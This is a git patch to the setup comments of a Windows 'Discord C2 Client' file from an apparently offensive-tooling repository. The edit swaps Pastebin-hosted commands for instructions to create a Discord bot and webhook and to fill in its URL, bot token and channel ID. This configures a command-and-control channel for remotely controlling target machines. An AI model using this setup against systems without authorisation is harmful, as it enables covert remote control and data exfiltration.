From 51de2c09e9da2ae85ff5cb5c2795b5fcc49e2654 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 7 Mar 2024 12:30:17 +0000 Subject: [PATCH] Update Discord C2 Client.txt --- Discord-C2/Discord C2 Client.txt | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/Discord-C2/Discord C2 Client.txt b/Discord-C2/Discord C2 Client.txt index cc22e06..8686a9c 100644 --- a/Discord-C2/Discord C2 Client.txt +++ b/Discord-C2/Discord C2 Client.txt @@ -5,10 +5,12 @@ REM Description: Using a Discord Server Chat and a github text file to Act as a REM Target: Windows 10 and 11 REM SETUP -REM Goto https://pastebin.com and make an account.. -REM Create an empty paste/file and copy the RAW url. -REM Change PASTEBIN_URL_HERE to the RAW url eg. https://pastebin.com/raw/QeCLTdea -OR- http://your.server.ip.here/files/file.txt -REM Change WEBHOOK_HERE to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx +REM make a discord bot at https://discord.com/developers/applications/ +REM add the bot to your discord server +REM create a webhook in the desired channel on your server. ( channel-settings/integrations ) +REM Change WEBHOOK_URL below to your webhook URL eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx +REM Change BOT_TOKEN below with your bot token +REM Change CHANNEL_ID below to the channel id of your webhook. REM for more info goto - https://github.com/beigeworm/PoshCord-C2